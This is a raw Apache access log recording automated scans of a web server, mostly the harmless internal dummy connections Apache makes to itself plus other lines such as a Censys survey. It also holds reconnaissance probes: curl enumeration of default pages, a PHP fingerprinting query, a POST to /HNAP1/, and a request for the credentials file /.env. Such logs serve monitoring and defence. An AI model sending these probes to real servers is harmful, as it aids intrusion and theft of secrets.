195.96.137.7 - - [03/Apr/2023:12:10:38 +0000] "GET /docs/cplugError.html HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:38 +0000] "GET /indice.aspx HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:38 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:38 +0000] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 44149 "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:39 +0000] "GET /indice.pl HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:39 +0000] "GET /start.asp HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:39 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:40 +0000] "GET /home.php HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [03/Apr/2023:12:10:40 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
195.96.137.7 - - [03/Apr/2023:12:10:40 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:41 +0000] "GET /inicio.jhtml HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [03/Apr/2023:12:10:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
195.96.137.7 - - [03/Apr/2023:12:10:41 +0000] "GET /home.html HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:42 +0000] "GET /index.html HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [03/Apr/2023:12:10:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
195.96.137.7 - - [03/Apr/2023:12:10:42 +0000] "GET /default.aspx HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:43 +0000] "GET /index.aspx HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [03/Apr/2023:12:10:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
195.96.137.7 - - [03/Apr/2023:12:10:43 +0000] "GET /indice.jsp HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:44 +0000] "GET /localstart.pl HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [03/Apr/2023:12:10:44 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
195.96.137.7 - - [03/Apr/2023:12:10:44 +0000] "GET /readme.txt HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:45 +0000] "GET /start.jsa HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:45 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
195.96.137.7 - - [03/Apr/2023:12:10:46 +0000] "GET / HTTP/1.1" 200 44149 "-" "-"
::1 - - [03/Apr/2023:12:10:50 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:12:10:53 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
43.154.128.189 - - [03/Apr/2023:12:25:33 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [03/Apr/2023:12:42:40 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
61.3.184.23 - - [03/Apr/2023:13:03:51 +0000] "POST /HNAP1/ HTTP/1.0" 301 235 "-" "-"
185.254.196.173 - - [03/Apr/2023:13:11:50 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:13:11:53 +0000] "POST / HTTP/1.1" 405 409676 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
31.220.1.83 - - [03/Apr/2023:13:42:35 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
